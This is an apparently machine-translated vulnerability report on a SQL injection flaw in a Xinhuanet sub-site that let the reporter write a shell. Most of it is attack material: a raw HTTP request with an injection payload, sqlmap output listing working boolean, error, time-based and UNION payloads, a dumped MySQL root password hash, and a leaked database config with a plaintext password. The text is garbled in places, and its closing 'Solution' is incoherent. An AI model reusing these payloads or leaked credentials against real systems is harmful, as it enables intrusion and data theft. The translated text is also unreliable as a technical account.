Xinhuanet sub-station injection vulnerability obtained Shell

Xinhuanet sub-station injection vulnerability obtained Shell

A substation in Xinhuanet has the SQL Injection Vulnerability (you can directly inject and write SHELL)

POST/index. php? A = search & m = Book HTTP/1.1

Content-Length: 325

Content-Type: application/x-www-form-urlencoded

Cookie: PHPSESSID = signature; expires = 1448597591,1448597651, 1448597738,1448597771; expires = 1448597771; HMACCOUNT = DAE66A74F1B9E64B

Host :**.**.**.**

Connection: Keep-alive

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept :*/*



Key = 'and (select % 201% 20 from (select % 20 count (*) % 2 cconcat (select % 20 concat (CHAR (52) % 2 cCHAR (67) % 2 cCHAR (117) % 2 cCHAR (52) % 2 cCHAR (75) % 2 cCHAR (81) % 2 cCHAR (55) % 2 cCHAR (83) % 2 cCHAR (109) % 2 cCHAR (118) % 2 cCHAR (52) % 20 from % 20information_schema.tables % 20 limit % 200% 2c1) % 2 cfloor (rand (0) * 2) x % 20 from % 20information_schema.tables % 20 group % 20by % 20x) a) and'

Sqlmap resumed the following injection point (s) from stored session:

---

Parameter: key (POST)

Type: boolean-based blind

Title: AND boolean-based blind-WHERE or HAVING clause

Payload: key = 1% 'AND 8851 = 8851 AND' % '='



Type: error-based

Title: MySQL >=5.0 AND error-based-WHERE, HAVING, order by or group by cl

Ause

Payload: key = 1% 'AND (SELECT 2176 FROM (select count (*), CONCAT (0x7176787171 ,(

SELECT (ELT (2176 = 2176, 1), 0x716a6b7671, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHE

MA. CHARACTER_SETS group by x) a) AND '%' ='



Type: AND/OR time-based blind

Title: MySQL> = 5.0.12 AND time-based blind

Payload: key = 1% 'and sleep (5) AND' % '='



Type: UNION query

Title: MySQL UNION query (NULL)-37 columns

Payload: key = 1% 'Union all select concat (0x7176787171, 0x7872476242637461637a

444b4b45567641506a6978564c695649784271566766484665586e0000854, 0x716a6b7671), NULL,

NULL,

NULL,

NULL, NULL, NULL #

---

Do you want to exploit this SQL injection? [Y/n]

[15:36:06] [INFO] the back-end DBMS is MySQL

Web server operating system: Linux CentOS 6.5

Web application technology: Apache 2.2.15

Back-end DBMS: MySQL 5.0



[*] Root [1]:

Password hash: * 3EA0DFA79A76FDCA62C8B7D3888C4B1D19D1DFFA




Return array (

'Db _ host' => 'localhost ',

'Db _ name' => 'weixinshop ',

'Db _ user' => 'root ',

'Db _ pwd' => '4xe6076437 ',

'Db _ port' => '123 ',

'Db _ prefix' => 'weixin _',

);


 

Virtual machines are not convenient.

Solution:

Three shells read the time and delete the local no32, which is always blocked. I thought I could not give up. Later I found that the shell was okay.